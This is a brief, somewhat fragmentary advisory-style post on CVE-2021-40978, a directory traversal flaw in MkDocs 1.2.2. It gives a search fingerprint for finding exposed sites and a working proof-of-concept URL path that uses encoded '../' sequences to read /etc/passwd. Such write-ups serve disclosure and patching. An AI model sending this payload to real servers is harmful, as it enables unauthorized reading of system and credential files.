Mkdocs Arbitrary File Reading Vulnerability Cve 2021 40978
Mkdocs Arbitrary File Reading Vulnerability Cve 2021 40978
MKdocs arbitrary file reading vulnerability CVE-2021-40978
Vulnerability Description
In MKdocs, traversing the directory through %2e%2e and reading sensitive files
Vulnerability Impact
Mkdocs 1.2.2
Network surveying and mapping
title=”My Docs”
Vulnerability reappears
Main page
Verify POC
1
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
This post is licensed under CC BY 4.0 by the author.